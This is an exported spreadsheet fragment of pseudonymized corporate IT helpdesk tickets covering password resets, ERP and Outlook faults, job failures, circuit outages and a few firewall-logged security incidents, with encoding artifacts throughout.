a kÃ¼ndigung foulgnmdia pgsqwrumh langmar, 2111451235, effective 26.08.2016 has been approved. 
click the link to view
</t>
  </si>
  <si>
    <t>unable to sign in to vpn</t>
  </si>
  <si>
    <t>ncjispka wspgujxm</t>
  </si>
  <si>
    <t>probleme bei der projekt eingabe im collaboration_platform / infopath</t>
  </si>
  <si>
    <t xml:space="preserve">dear it,_x000D_
_x000D_
still some issues with the tracker even with your message in collaboration_tool etc._x000D_
_x000D_
jertyur can difozlav dgbfptos make a ticket and contact you or some other person?_x000D_
_x000D_
they cannot enter any projects._x000D_
_x000D_
please let us know._x000D_
_x000D_
_x000D_
_x000D_
--_x000D_
mit freundlichen grÃ¼ÃŸen/ best </t>
  </si>
  <si>
    <t>difozlav dgbfptos</t>
  </si>
  <si>
    <t>lean tracker problems</t>
  </si>
  <si>
    <t xml:space="preserve">hello it helpdesk,_x000D_
_x000D_
good morning._x000D_
i am not able to add new project into collaboration_platform lean tracker (contacting you, the helpdesk as per instruction from below mail). _x000D_
_x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>inc1553541 - ticket update</t>
  </si>
  <si>
    <t>procenter login credential for new joiner</t>
  </si>
  <si>
    <t xml:space="preserve">please create procenter login credential for below new joiners.
name:keyhuerthi vtyr
user id:reddatrhykv
</t>
  </si>
  <si>
    <t>access to teams drive - folder sox self-assessments - user priflhtret</t>
  </si>
  <si>
    <t xml:space="preserve">need access to folder sox self-assessments for quaterly sox requests_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>bayxwszc oiedajqz</t>
  </si>
  <si>
    <t xml:space="preserve">job bk_hana_SID_22_arc_dp failed in job_scheduler at: 09/27/2016 06:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bk_hana_SID_22_arc_dp failed in job_scheduler at: 09/27/2016 06:02:00</t>
  </si>
  <si>
    <t>r3ad hr queues stuck in SID_39 - 21k entries</t>
  </si>
  <si>
    <t>hr employee data is not replicated - got stuck in SID_39</t>
  </si>
  <si>
    <t>probleme mit druecker mp16</t>
  </si>
  <si>
    <t>probleme mit druecker mp16_x000D_
_x000D_
fehlermeldung: "transport einheit fehlt, oder motor fehler aufgetreten_x000D_
das ist eine leasing druecker.</t>
  </si>
  <si>
    <t>misplaced password</t>
  </si>
  <si>
    <t>security incidents - ( #in33976733) : suspicious ms-rpc/ms-ds/netbios activity - android-ba50a4497de455a</t>
  </si>
  <si>
    <t>source ip: 10.16.90.249_x000D_
source hostname: android-ba50a4497de455a_x000D_
source port: 55198_x000D_
source mac address: 50:2e:5c:f0:f6:98_x000D_
system name :_x000D_
user  name:_x000D_
location :_x000D_
sep , sms status :_x000D_
field sales user ( yes / no) :  _x000D_
dsw event log:_x000D_
-------------------------------------------------------------------------------------------------------------_x000D_
=========================_x000D_
event data_x000D_
=========================_x000D_
related events: _x000D_
event id: 84682727_x000D_
event summary: internal outbreak for 137/udp_x000D_
occurrence count: 505_x000D_
event count: 1_x000D_
_x000D_
host and connection information_x000D_
source ip: 10.16.90.249_x000D_
source hostname: android-ba50a4497de455a_x000D_
source port: 55198_x000D_
source mac address: 50:2e:5c:f0:f6:98_x000D_
destination hostname: [no entry]_x000D_
destination port: 137_x000D_
connection directionality: internal_x000D_
protocol: udp_x000D_
_x000D_
device information_x000D_
device ip: 80.71.06.702_x000D_
device name: company-european-asa.company.com-1_x000D_
log time: 2016-09-26 at 08:23:55 utc_x000D_
action: blocked_x000D_
cvss score: -1 _x000D_
_x000D_
scwx event processing information_x000D_
sherlock rule id (sle): 537074_x000D_
inspector rule id: 186739_x000D_
inspector event id: 639601949_x000D_
ontology id: 200020003203009162_x000D_
event type id: 200020003203009062_x000D_
agent id: 103761_x000D_
_x000D_
event detail:_x000D_
sep 26 08:23:55 80.71.06.702 %asa-4-106023: deny udp src inside:10.16.90.249/55198 dst noris:100.74.211.4/137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noris:100.74.211.3/137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noris:100.74.211.5/137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noris:100.74.211.6/137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noris:100.74.211.7/137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noris:100.74.211.8/137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noris:100.74.211.2/137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noris:100.74.211.10/137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noris:100.74.211.11/137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noris:100.74.211.13/137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noris:100.74.211.15/137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noris:100.74.211.16/137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noris:100.74.211.9/137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noris:100.74.211.12/137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noris:100.74.211.14/137 by access-group "acl_inside" [0x30e3d92a, 0x0]_x000D_
_x000D_
[correlation_data]_x000D_
sep 26 04:23:54 60.43.89.120 dhcpd[23598]: dhcpack on 10.16.90.249 to 50:2e:5c:f0:f6:98 (android-ba50a4497de455a) via eth2 relay 10.16.88.2 lease-duration 691200 (renew)_x000D_
_x000D_
ascii packet(s):_x000D_
[no entry]_x000D_
_x000D_
hex packet(s):_x000D_
[no entry]</t>
  </si>
  <si>
    <t>security incidents - ( #in33984033) : internal outbreak for port 7 from awyl8911000/10.44.167.92</t>
  </si>
  <si>
    <t>source ip :_x000D_
system name :_x000D_
user  name:_x000D_
location :_x000D_
sep , sms status :_x000D_
field sales user ( yes / no) :  _x000D_
dsw event log:_x000D_
==================================================_x000D_
=========================_x000D_
event data_x000D_
=========================_x000D_
related events: _x000D_
event id: 95389376_x000D_
event summary: internal outbreak for 7/udp_x000D_
occurrence count: 254_x000D_
event count: 1_x000D_
_x000D_
host and connection information_x000D_
source ip: 10.44.167.92_x000D_
source hostname: awyl8911000 _x000D_
source port: 61814_x000D_
source mac address: 0a:f5:c1:ab:82:b3:00:00:00:00:00:00:00:00:00:00_x000D_
destination hostname:_x000D_
destination port: 7_x000D_
connection directionality: internal_x000D_
protocol: udp_x000D_
_x000D_
device information_x000D_
device ip: 54.96.80.216_x000D_
device name: att-apac-asa.company.com-1_x000D_
log time: 2016-09-27 at 04:07:44 utc_x000D_
action: blocked_x000D_
cvss score: -1 _x000D_
_x000D_
scwx event processing information_x000D_
sherlock rule id (sle): 575501_x000D_
inspector rule id: 186739_x000D_
inspector event id: 893515308_x000D_
ontology id: 200020003203009162_x000D_
event type id: 200020003203009062_x000D_
agent id: 103955_x000D_
_x000D_
event detail:_x000D_
sep 27 04:07:44 54.96.80.216 %asa-4-106023: deny udp src inside:10.44.167.92/61814 dst outside:192.168.0.1/7 by access-group "acl_inside" [0x0, 0x0]_x000D_
_x000D_
[correlation_data]_x000D_
sep 27 00:07:25 46.45.62.5146 dhcpd[21574]: dhcpack on 10.44.167.92 to 0a:f5:c1:ab:82:b3:00:00:00:00:00:00:00:00:00:00 (awyl8911000) via eth2 relay 10.44.86.71 lease-duration 14400 (renew)_x000D_
sep 27 04:07:44 54.96.80.216 %asa-4-106023: deny udp src inside:10.44.167.92/61812 dst outside:100.87.127.110/7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inside:10.44.167.92/57415 dst outside:192.168.0.2/7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inside:10.44.167.92/57416 dst outside:192.168.0.3/7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inside:10.44.167.92/57417 dst outside:192.168.0.4/7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inside:10.44.167.92/57418 dst outside:192.168.0.5/7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inside:10.44.167.92/57419 dst outside:192.168.0.6/7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inside:10.44.167.92/57420 dst outside:192.168.0.7/7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inside:10.44.167.92/57421 dst outside:192.168.0.8/7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inside:10.44.167.92/57422 dst outside:37.07.71.825/7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inside:10.44.167.92/57423 dst outside:192.168.0.10/7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inside:10.44.167.92/57424 dst outside:192.168.0.11/7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inside:10.44.167.92/57425 dst outside:51.64.73.461/7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inside:10.44.167.92/57426 dst outside:192.168.0.13/7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inside:10.44.167.92/57427 dst outside:192.168.0.14/7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inside:10.44.167.92/57428 dst outside:192.168.0.15/7 by access-group "acl_inside" [0x0, 0x0]_x000D_
_x000D_
[correlation_data]_x000D_
sep 27 00:07:25 46.45.62.5146 dhcpd[21574]: dhcpack on 10.44.167.92 to 0a:f5:c1:ab:82:b3:00:00:00:00:00:00:00:00:00:00 (awyl8911000) via eth2 relay 10.44.86.71 lease-duration 14400 (renew)_x000D_
_x000D_
ascii packet(s):_x000D_
_x000D_
_x000D_
hex packet(s):</t>
  </si>
  <si>
    <t>kfdyzexr hnbetvfk : password reset</t>
  </si>
  <si>
    <t>please provide the following:_x000D_
_x000D_
what order number? 35066374/000030_x000D_
_x000D_
what material or item number? 7415836_x000D_
_x000D_
what warehouse location? plant_69_x000D_
_x000D_
issue description / error message? create delivery not allowed (sys. status exls, object vb0035066374000030)</t>
  </si>
  <si>
    <t>aztqelgy fqnkuxvw</t>
  </si>
  <si>
    <t xml:space="preserve">mobile device activation </t>
  </si>
  <si>
    <t>ayktfvjr soghziec</t>
  </si>
  <si>
    <t>po language is incorrect-po#4505652547</t>
  </si>
  <si>
    <t xml:space="preserve">from: xjvubmlq vyamhjip _x000D_
sent: tuesday, september 27, 2016 10:18 am_x000D_
to: nwfodmhc exurcwkm_x000D_
subject: rad:po language is incorrect-po#5616763658_x000D_
_x000D_
hello ,_x000D_
the po language is correct when i print output it ._x000D_
 _x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
but when i use "zz_mails ", the po language is incorrect, could you please help to check it?_x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
with best </t>
  </si>
  <si>
    <t>reset the password for pumjbcna scluvtyj on erp / qa / hcm</t>
  </si>
  <si>
    <t xml:space="preserve">hi all,
the user romertanj need their password reset.
</t>
  </si>
  <si>
    <t>pumjbcna scluvtyj</t>
  </si>
  <si>
    <t>reset passwords for pumjbcna scluvtyj using password_management_tool password reset.</t>
  </si>
  <si>
    <t xml:space="preserve">hi all,_x000D_
_x000D_
please, the user romertanj need their password reset._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>outlook not getting connected to exchange server</t>
  </si>
  <si>
    <t xml:space="preserve">urgent // price update error </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: uarnkqps.gufcjxma@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
i have to divide the quantity of the item due to partial shipment and currency issue. but while dividing item quantity and re-writing zno for currency update process, zno price is deleted._x000D_
i try to enter the price again with zno however the system can't allow it and bring the new price with zcnp._x000D_
_x000D_
so could you help me please?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
[cid:image002.jpg@01SID_358a8.eb5a4620]_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
saygÄ±larÄ±mÄ±zla / best </t>
  </si>
  <si>
    <t>uarnkqps gufcjxma</t>
  </si>
  <si>
    <t>fjetbklw oeuawsbq</t>
  </si>
  <si>
    <t>drucker dell 1350 cnw druckt alle seiten mit grauschleiher</t>
  </si>
  <si>
    <t>druckt druckt alles vergraut</t>
  </si>
  <si>
    <t>wgmnjxft zeyhasdj</t>
  </si>
  <si>
    <t>finance_app</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: bujiesrg.zopcrshl@gmail.com_x000D_
_x000D_
dear allï¼Œ_x000D_
_x000D_
can you help me to access below forms? </t>
  </si>
  <si>
    <t>password for w-lan anrgtdy bofffgtyin</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: dubpgacz.kjzhilng@gmail.com
hello,
my college anrgtdy bofffgtyin came to germany, germany fort he work and needs to connect to w-lan.
could you please send him password for guest w-lan connetction?
anrgtdy bofffgtyin
technical programdntyme manager aerospace and defence
godjevmy.gfaevrdq@gmail.com&lt;mailto:godjevmy.gfaevrdq@gmail.com&gt;
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>dubpgacz kjzhilng</t>
  </si>
  <si>
    <t>adxuzbcv uojxrivy</t>
  </si>
  <si>
    <t>help to pose the 4 pos which cannot be posed by erp now</t>
  </si>
  <si>
    <t xml:space="preserve">when the 4 pos are posed, as the local tax law, we need choose j0 for them. however, after we choose j0 as tax code, erp shows red message like the attachments. then we make tax code empty, erp will require to place a tax code. this make us confused how to pose this 4 pos. please help to pose them. </t>
  </si>
  <si>
    <t xml:space="preserve">account locked in supply_chain_software </t>
  </si>
  <si>
    <t xml:space="preserve">circuit outage:australia-dmvpn-1811-rtr02 down since 1:30 am on 9/27/2016 </t>
  </si>
  <si>
    <t>what type of outage:  _____network     ___yes__circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ___no______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _____1:30 am on 9/27/2016 _________________x000D_
_x000D_
3.  scheduled maintenance ( power) ? ___no____    (yes/no/na)     company power  _________     provider power __________x000D_
                _x000D_
4.  scheduled maintenance ( network) ? _____no__    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000D_
_x000D_
5. does site have a backup circuit ?  __yes___    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   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</si>
  <si>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final inwarehouse_tool for project is not working correctly</t>
  </si>
  <si>
    <t xml:space="preserve">dear it team,_x000D_
_x000D_
i have again an issue with a final inwarehouse_tool. i have the following erp order: 34827963._x000D_
we had a down payment of all items, but a final shipment of item 10,20,50,60,70._x000D_
items 30 and 40 have not been shipped, hence we are not allowed to do an final inwarehouse_tool for this. _x000D_
so i tried to do a final inwarehouse_tool for items 10,20,50,60,70, but it did not work. with inwarehouse_tool 0159198781 the down payment amount got deducted twice. _x000D_
so i cancelled all inwarehouse_tools, incl. down payment inwarehouse_tool and separated them, one inwarehouse_tool for item 10,20,50,60,70 and another inwarehouse_tool for item 30,40._x000D_
after that i tried again to inwarehouse_tool it. but still the wrong amunt was shown. i need to have an inwarehouse_tool for item 10,20,50,60,70 with amount 350.740 minus 105.222 down paymant. can you please have a look and help me? _x000D_
this is not a single issue, we had that already several times. </t>
  </si>
  <si>
    <t>fmqubnvs kcxpeyiv</t>
  </si>
  <si>
    <t>after changing the password,outlook is not responding to the newly assigned password.</t>
  </si>
  <si>
    <t>name:mandgtryjuth
language:
browser:microsoft internet explorer
email:onbugvhi.vzjfgckt@gmail.com
customer number:
telephone:
summary:after changing the password,outlook is not responding to the newly assigned password.</t>
  </si>
  <si>
    <t>lfamubxq evgwkyix</t>
  </si>
  <si>
    <t>engineering_tool-new customer addition</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: skmdgnuh.utgclesd@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
still same error persists._x000D_
_x000D_
[cid:image001.png@01SID_358ae.c667c030]_x000D_
_x000D_
with warm </t>
  </si>
  <si>
    <t>hpqc account--reset password</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: phfduvwl.yqnaucep@gmail.com
hello
i failed to login my hpqc account and got below message.
could you please reset password for my hpqc account, i need it to do uacyltoe hxgaycze next week
my user id is zhudrs
[cid:image001.png@01SID_358c2.0b26f430]
</t>
  </si>
  <si>
    <t>phfduvwl yqnaucep</t>
  </si>
  <si>
    <t xml:space="preserve">unable to open outlook and business_client </t>
  </si>
  <si>
    <t>ç”µè„‘ç¡¬ç›˜æ•…éšœï¼Œè¯·æ±‚ç»´ä¿®ã€‚</t>
  </si>
  <si>
    <t>ruhbyzpv vlksnjti</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: otpkzifh.gywinoml@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
i am unable to access business_client. when i open business_client, it goes directly into below screen._x000D_
kindly look into._x000D_
_x000D_
_x000D_
[cid:image001.jpg@01SID_358ac.6fbbdcf0]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3190 failed in job_scheduler at: 09/27/2016 01:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3190 failed in job_scheduler at: 09/27/2016 01:00:00</t>
  </si>
  <si>
    <t>the plm conversion server - is reporting a : warning status on, HostName_108. please investigate</t>
  </si>
  <si>
    <t xml:space="preserve">the plm conversion server - is reporting a : warning status on, HostName_108. please investigate
</t>
  </si>
  <si>
    <t>add the inxsupmy zhwmifvx to materials_management / purchasing</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: inxsupmy.zhwmifvx@gmail.com
hello team,
can you please add inxsupmy zhwmifvx  to the materials_management/purchasing group in ticketing_tool .
inxsupmy zhwmifvx
team lead - ssl (sourcing &amp; logistics) - global it
inxsupmy.zhwmifvx@gmail.com
</t>
  </si>
  <si>
    <t>erp login blocked</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ublisodp.qydfvpgw@gmail.com_x000D_
_x000D_
hello_x000D_
_x000D_
i am not able to login into erp as my attempts exceed the set limit._x000D_
requesting you to unblock the same._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>outlook is not updating on my laptop</t>
  </si>
  <si>
    <t>name:warrrtyen
language:
browser:microsoft internet explorer
email:wmybrona.qvwhpamb@gmail.com
customer number:
telephone:
summary:outlook is not updating on my laptop</t>
  </si>
  <si>
    <t>wmybrona qvwhpamb</t>
  </si>
  <si>
    <t>circuit outage : carrier india dmvpn-rtr02 is down since 10:37 pm et on 09/26.</t>
  </si>
  <si>
    <t>what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ____________10:37 pm et on 09/26.__________x000D_
_x000D_
3.  scheduled maintenance ( power) ? _____no__    (yes/no/na)     company power  _________     provider power __________x000D_
                _x000D_
4.  scheduled maintenance ( network) ? _____no__    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000D_
_x000D_
5. does site have a backup circuit ?  ___yes___    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   _____yes___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</si>
  <si>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dbhwzfxy amhowrfk</t>
  </si>
  <si>
    <t>sound system of laptop</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ygkzwsud.cvjgkxws@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
i need a help, the sound system of my laptop doesn't seem to be working, neither through speaker nor through ear phone. it's very inconvenient for skype calls._x000D_
_x000D_
please look into this._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>erp login trouble</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: xosycftu.olhpmsdw@gmail.com_x000D_
_x000D_
hello_x000D_
_x000D_
please see this error._x000D_
i can not log in erp._x000D_
please tell me the solution._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>xosycftu olhpmsdw</t>
  </si>
  <si>
    <t>circuit outage : switzerland dmvpn-2821-rtr01 is down since 11:38 pm et on 09/26.</t>
  </si>
  <si>
    <t>what type of outage:  _____network     ___x__circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ___yes______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   __________11:38 pm et on 09/26.____________x000D_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____yes____     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  _____no____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</si>
  <si>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hr_tool-etime ç³»ç»Ÿä¸èƒ½ç™»å½•ï¼Œä¸€ç›´æ˜¾ç¤ºæ­£åœ¨åŠ è½½åº”ç”¨æ•°æ®åº“</t>
  </si>
  <si>
    <t>qekyowtv qdjixvkh</t>
  </si>
  <si>
    <t>erp system - very slow response_apac</t>
  </si>
  <si>
    <t xml:space="preserve">we've faced the problem of erp system which is very slow response time. please help check and fixing this issue to make erp system more faster speed. </t>
  </si>
  <si>
    <t>HostName_212 : /dev/u00lv is over  20% space consumed. space available: 28.3 g</t>
  </si>
  <si>
    <t>unable to browse "hr_tool" site.</t>
  </si>
  <si>
    <t>unable to browse "hr_tool" site. snapshot of error is attached.</t>
  </si>
  <si>
    <t>cpnqvlfk imjucnes</t>
  </si>
  <si>
    <t>é‚®ç®±æ— æ³•å¯åŠ¨</t>
  </si>
  <si>
    <t>é‚®ç®±æ— æ³•å¯åŠ¨ï¼Œæç¤ºæ— æ³•åˆ›æ–°æ–°çš„å †æ ˆé˜²æŠ¤é¡µé¢ã€‚</t>
  </si>
  <si>
    <t>bzypjigs qokwvgyn</t>
  </si>
  <si>
    <t xml:space="preserve">job pp_EU_tool_netch_keheu2 failed in job_scheduler at: 09/26/2016 22:37:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job pp_EU_tool_netch_keheu2 failed in job_scheduler at: 09/26/2016 22:37:00</t>
  </si>
  <si>
    <t>crm</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: hmjdrvpb.komuaywn@gmail.com_x000D_
_x000D_
good day,_x000D_
_x000D_
can you please advise whether crm is going through updates at the moment?_x000D_
_x000D_
there are a number of issues concerning us in 1301:_x000D_
_x000D_
_x000D_
1.       at the moment we cannot access crm at all._x000D_
_x000D_
2.       yesterday, i could not enter new customer accounts as my drop down boxes were not fully loading and thus, i could only see one or two items to select from._x000D_
_x000D_
3.       the team here in australia advised that lately that they have had to contact customer master on numerous occasions as there are certain entries in crm, new customer accounts, that are not transferring to erp like:_x000D_
sales reps_x000D_
carriers_x000D_
etc_x000D_
_x000D_
we were advised by our finance department that they believed it were aware of such problems above?_x000D_
_x000D_
kind </t>
  </si>
  <si>
    <t xml:space="preserve">job bkwin_HostName_768_inc failed in job_scheduler at: 09/26/2016 22:33:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bkwin_HostName_768_inc failed in job_scheduler at: 09/26/2016 22:33:00</t>
  </si>
  <si>
    <t>apac china, apac dc &amp; company colleagues said the erp is very slow. i ping erp address 81.93.78.714, 50% packet loss.</t>
  </si>
  <si>
    <t>bqdyhnoj rwyvsfgn</t>
  </si>
  <si>
    <t xml:space="preserve">job pp_EU_tool_netch_ap2 failed in job_scheduler at: 09/26/2016 22:24:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job pp_EU_tool_netch_ap2 failed in job_scheduler at: 09/26/2016 22:24:00</t>
  </si>
  <si>
    <t>purchasing order export issue</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: jrdafplx.fcnjmvts@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
when i export the po files to pdf format in erp by command zz_mails , sometimes , it's show the other language rather than chinese ,so how can i solve it?_x000D_
_x000D_
_x000D_
[cid:image001.png@01SID_358a8.5c6486b0]_x000D_
_x000D_
with best </t>
  </si>
  <si>
    <t>jrdafplx fcnjmvts</t>
  </si>
  <si>
    <t>password reset via password_manager_tool password manager</t>
  </si>
  <si>
    <t>outlook not working and unable to receive emails.</t>
  </si>
  <si>
    <t>engineering_tool-new customer</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: skmdgnuh.utgclesd@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
not able to add new customer in engineering_tool, kindly support to solve the error._x000D_
_x000D_
[cid:image001.png@01SID_35883.6872ebb0]_x000D_
_x000D_
with warm </t>
  </si>
  <si>
    <t>msd: outlook not showing the crm add-in.</t>
  </si>
  <si>
    <t xml:space="preserve">msd: outlook not showing the crm add-in._x000D_
-connected to the user system using teamviewer._x000D_
-deleted and reconfigured the user profile on crm._x000D_
-launched outlook._x000D_
-user confirmed by closing and relaunching outlook everything is fine now._x000D_
-issue resolved._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ohnimgtv nmqyuolh</t>
  </si>
  <si>
    <t>vpn access status check</t>
  </si>
  <si>
    <t>HdOuWxAt qfKdlJMx</t>
  </si>
  <si>
    <t>cannot find dr. cyxieuwk rekwlqmu in ticketing_tool</t>
  </si>
  <si>
    <t>i tried to add cyxieuwk.rekwlqmu@gmail.com to the watch list on a ticket but i couldn't find him in ticketing_tool._x000D_
please active christgrytoph's account in ticketing_tool.</t>
  </si>
  <si>
    <t>alrthyu s lowe. my ee# is 6045304.it needs to show under me in the financial report that mikhghytr robhyertyjs receives from nicrhty pi</t>
  </si>
  <si>
    <t xml:space="preserve">from: scthyott lortwe 
sent: monday, september 26, 2016 8:42 pm
to: nwfodmhc exurcwkm
subject: trup[ti fw: recode acct
importance: high
it team
please see the email chain below. please assign this to me, alrthyu s lowe. my ee# is 6045304.
it needs to show under me in the financial report that mikhghytr robhyertyjs receives from nicrhty piper.
scthyott lortwe
sales manager â€“ southeast 
industrial segment
sbvlxuwm.yanbikrx@gmail.com
from: christgry financial_toolher 
sent: monday, september 26, 2016 9:30 am
to: mikhghytr robhyertyjs &lt;sgblhypi.htqmidsn@gmail.com&gt;; scthyott lortwe &lt;sbvlxuwm.yanbikrx@gmail.com&gt;
subject: re: recode acct
hi mikhghytr â€“ that is not an account in erp. it is new customer quota that was loaded into financial reporting per the direction of cpmaidhj elbaqmtp. unfortunately, you will need to submit an it ticket to have it reassigned. 
kindest </t>
  </si>
  <si>
    <t>sbvlxuwm yanbikrx</t>
  </si>
  <si>
    <t>expense report issue : getting alert in expense report. screenshots attached.</t>
  </si>
  <si>
    <t xml:space="preserve">expense report issue _x000D_
_x000D_
please change cost center for user </t>
  </si>
  <si>
    <t>outlook language is changing automatically.</t>
  </si>
  <si>
    <t>outlook language is changing automatically._x000D_
-connected to the user system using teamviewer._x000D_
-changed the launguage settings as english default._x000D_
-restarted the pc._x000D_
-advised the user to check now._x000D_
-user confirmed that the outlook language is now english._x000D_
-educated the user about the steps to take to change the outlook launguage._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>tyuhfljp zyjfpgtk</t>
  </si>
  <si>
    <t>load telephony_software onto users pc</t>
  </si>
  <si>
    <t>wrqxmfan fsizndjb</t>
  </si>
  <si>
    <t>no audio while on skype call</t>
  </si>
  <si>
    <t>problem with erp login the server list is not available.</t>
  </si>
  <si>
    <t>iorecadj crtmqdjg</t>
  </si>
  <si>
    <t>i am not able to upload engineering_tool, see below screen shot.</t>
  </si>
  <si>
    <t>not able to login to windows</t>
  </si>
  <si>
    <t>bwisgahv phqmgouw</t>
  </si>
  <si>
    <t>user unable to login to the telephony_software .</t>
  </si>
  <si>
    <t xml:space="preserve">user unable to login to the telephony_software .
-user unable to login to the interaction client.
-user getting authenication error.
-contact: </t>
  </si>
  <si>
    <t xml:space="preserve">compensation system is missing september inwarehouse_tools </t>
  </si>
  <si>
    <t>the compensation system is missing september inwarehouse_tools, which is impacting sales compensation reports for all of north amerirtca field sales. please assign to bw team and consult zarthyc mithycs for resolution.</t>
  </si>
  <si>
    <t>aofextgk tugywidl</t>
  </si>
  <si>
    <t>ockwafib.wftboqry@gmail.com called to service desk to check status of pomjgvte.goswvnci@gmail.com</t>
  </si>
  <si>
    <t xml:space="preserve">ockwafib.wftboqry@gmail.com called to service desk to check status of pomjgvte.goswvnci@gmail.com for account activation._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>cÃ³pia de conta telefonica</t>
  </si>
  <si>
    <t>solicito fornecer cÃ³pia da conta telefÃ´nica do celular do perÃ­odo de 20 de junho a 20 de setembro/2016</t>
  </si>
  <si>
    <t>GRP_62</t>
  </si>
  <si>
    <t>dughqrnf mebofqhz</t>
  </si>
  <si>
    <t>confirmation qty window not deducting confirmed pieces in default qty field</t>
  </si>
  <si>
    <t>as per my understanding, mii should subtract already confirmed pieces from order planned quantity from confirmation screen whenever user is confirming something. _x000D_
for ex. for a 1000 piece order, if user confirms 400 pieces, the next user or same user next time when confirms that operation, the default qty presented should be 600 but i'm noticing its presenting the original 1000</t>
  </si>
  <si>
    <t>rzonkfua yidvloun was unable to login to windows and outlook</t>
  </si>
  <si>
    <t>partial confirmation info sent to erp but machine status behaving differently (usa)</t>
  </si>
  <si>
    <t xml:space="preserve">usa go-live week. issue reported on 9/21_x000D_
_x000D_
order #226038501 _x000D_
op # 0030 _x000D_
work center # 73122161_x000D_
_x000D_
operation was in prir status [9/2sartlgeo lhqksbdx2.33 pm] but mii won't allow to resume run. _x000D_
gergryth changed status in mii from prst to prir, it changed status in to-di list but not in machine summary_x000D_
_x000D_
start process = 9/20 19.43 = 7.43 pm_x000D_
current time = 9/2sartlgeo lhqksbdx2.50 pm_x000D_
time elapsed ~17 hours and that's what we're seeing on machine summary dashbankrd meaning mii did send partial confirmation information to erp but didn't used the same information for machine status view etc. _x000D_
_x000D_
so, in summary, the partial confirmation information made it to erp perfectly fine but the machine status windows wasn't updated with partial confirmation pause and behaved as if partial confirmation pause never happened_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
example from usa_x000D_
for usa location and order 226033677, operation 10_x000D_
_x000D_
mii showed the order in prpf status, looking at erp, order was partially confirmed followed by "automatic pause"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solution_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>unable to print purchase orders from erp</t>
  </si>
  <si>
    <t>entered "data maintenance" window using operators credential (usa)</t>
  </si>
  <si>
    <t xml:space="preserve">during usa go-live week on 9/22 i was able to get into data maintenance on operator pc using operator id.. exact steps listed below
1. operator had operator dashbankrd open on his pc
2. he asked for help and todfrm brgyake (plant manager), zcudbnyq rdxzgpej (manufacturing manager) and i stopped by operators desk
3. his question required to get into "data maintenance" and confirm something (original question was about interrupt codes)
4. i opened a new "tab", right next to operator dashbankrd and typed url of data maintenance
5. then i went into operator dashbankrd tab and clicked log out (i was expecting to enter my own credentials to get into data maintenance)
6. but some thing weird happened, the moment i switched to data maintenance tab, i realized i was already logged in, without entering my id
7. i double checked with tom and davidthd that if i was maybe dreaming and entered my credentials but they confirmed, application took me to home screen of data maintenance without asking credentials 
</t>
  </si>
  <si>
    <t>the kÃ¼ndigung action for pfgia scgtitt has completed.</t>
  </si>
  <si>
    <t xml:space="preserve">hello , 
a kÃ¼ndigung for pfgia scgtitt, 1156212249, effective 22.07.2016 has been approved. 
</t>
  </si>
  <si>
    <t>vmthcrkf iceyusnd</t>
  </si>
  <si>
    <t>mii logging in under different user</t>
  </si>
  <si>
    <t>issue reported from usa, usa and usa
note from erin 
